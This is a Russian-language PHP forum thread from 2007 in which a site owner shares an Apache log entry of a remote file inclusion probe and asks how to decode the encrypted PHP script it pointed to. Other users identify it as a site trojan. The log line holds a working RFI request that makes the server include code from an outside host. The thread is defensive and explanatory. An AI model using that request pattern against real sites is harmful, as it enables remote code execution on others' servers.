За последние 24 часа нас посетили 58090 программистов и 1848 роботов. Сейчас ищут 1063 программиста ...

Помогите расшифровать.

Тема в разделе "Прочие вопросы по PHP", создана пользователем mmaavv, 1 дек 2007.

  1. mmaavv

    mmaavv Активный пользователь

    С нами с:
    25 мар 2007
    Сообщения:
    59
    Симпатии:
    0
    В общем обнаружил я в логах апача вот такой запрос:
    Код (Text):
    1. 24.80.100.94 - - [30/Nov/2007:23:58:05 +0000] "GET /forum/index.php?action=http://hotraebywka.chat.ru/images/girl? HTTP/1.1" 200 24856 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
    по адресу http://hotraebywka.chat.ru/images/girl? находится зашифрованный php скрипт. На мой взгляд - какой-то шпион. посылает инфу о хосте куда-то.
    Кто-нибудь знает чем это можно расшифровать автоматически ? А то в ручную неохота.
     
  2. Dagdamor

    Dagdamor Активный пользователь

    С нами с:
    4 фев 2006
    Сообщения:
    2.095
    Симпатии:
    1
    Адрес:
    Барнаул
    mmaavv
    Что-то наподобие PhpRemoteView. Троян для сайта, если он конечно ухитрится его заинклюдить.
    Не боись, SMF такими примитивными методами не проймешь :)
     
  3. antonn

    antonn Активный пользователь

    С нами с:
    10 июн 2007
    Сообщения:
    2.996
    Симпатии:
    0
    у меня больше десятка таких умников инклуды проверяют в сутки, хотя я сайт то не светил почти негде, не перевелись еще простаки... Или у них принцип - винда, значит надо завалить? %)
     
  4. mmaavv

    mmaavv Активный пользователь

    С нами с:
    25 мар 2007
    Сообщения:
    59
    Симпатии:
    0
    Мне просто интересно посмотреть исходники данного "трояна".
    Для самообразования.